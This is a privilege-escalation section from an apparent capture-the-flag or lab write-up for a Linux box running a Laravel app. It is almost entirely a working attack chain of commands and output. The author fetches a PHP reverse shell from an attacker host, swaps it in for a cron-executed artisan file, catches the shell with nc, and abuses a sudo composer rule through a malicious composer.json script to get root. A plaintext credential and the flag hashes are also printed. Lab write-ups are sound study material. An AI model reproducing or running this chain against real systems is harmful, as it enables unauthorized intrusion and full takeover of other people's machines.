Priv Esc

$ ss -anp
...
tcp   LISTEN 0      80                                      127.0.0.1:3306                         0.0.0.0:*                                 
tcp   LISTEN 0      128                                       0.0.0.0:22                           0.0.0.0:*                                 
tcp   ESTAB  0      2                                  192.168.111.38:52228                 192.168.45.168:1337  users:(("nc",pid=4310,fd=3))
tcp   LISTEN 0      511                                             *:80                                 *:*                                 
tcp   LISTEN 0      128                                          [::]:22                              [::]:*                                 
tcp   ESTAB  0      0                         [::ffff:192.168.111.38]:80          [::ffff:192.168.251.111]:42176                             
v_str ESTAB  0      0                                      3293820751:1023                               0:976

lavita:sdfquelw0kly9jgbx92sdfquelw0kly9jgbx9

Skunk is running the following cron job

www-data@debian:/dev/shm$ ls -la /var/www/html/lavita/artisan
-rwxr-xr-x 1 www-data www-data 1686 Nov 10  2020 /var/www/html/lavita/artisan

www-data@debian:/var/www/html/lavita$ wget 192.168.45.239/php-reverse-shell.php
--2024-09-16 20:09:10--  http://192.168.45.239/php-reverse-shell.php
Connecting to 192.168.45.239:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5496 (5.4K) [application/octet-stream]
Saving to: ‘php-reverse-shell.php’

php-reverse-shell.p 100%[===================>]   5.37K  --.-KB/s    in 0.001s  

2024-09-16 20:09:10 (7.06 MB/s) - ‘php-reverse-shell.php’ saved [5496/5496]

www-data@debian:/var/www/html/lavita$ rm artisan
www-data@debian:/var/www/html/lavita$ mv php-reverse-shell.php artisan

$ nc -lnvp 1338
listening on [any] 1338 ...
connect to [192.168.45.239] from (UNKNOWN) [192.168.235.38] 51340
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
 20:10:08 up 46 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami && id && cat /home/skunk/local.txt && ip a
skunk
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
29f6f5609176f708b80640e2cf2ac5f3
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:febf:694d/64 scope link 
       valid_lft forever preferred_lft forever

skunk@debian:~$ sudo -l
Matching Defaults entries for skunk on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User skunk may run the following commands on debian:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *

composer | GTFOBinsgtfobins.github.io

skunk@debian:~$ id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)

Go back to www-data shell

www-data@debian:/var/www/html/lavita$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > composer.json

Back in skunk shell

skunk@debian:/var/www/html/lavita$ sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami && cat /root/proof.txt && ip addr
root
c380027d15f40bf8d3325d392ce50dc4
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:bf:69:4d brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.235.38/24 brd 192.168.235.255 scope global ens192
       valid_lft forever preferred_lft forever
    inet6 fe80::250:56ff:febf:694d/64 scope link 
       valid_lft forever preferred_lft forever
#

PreviousFoothold NextCredentials / Notes / LL

Last updated 1 year ago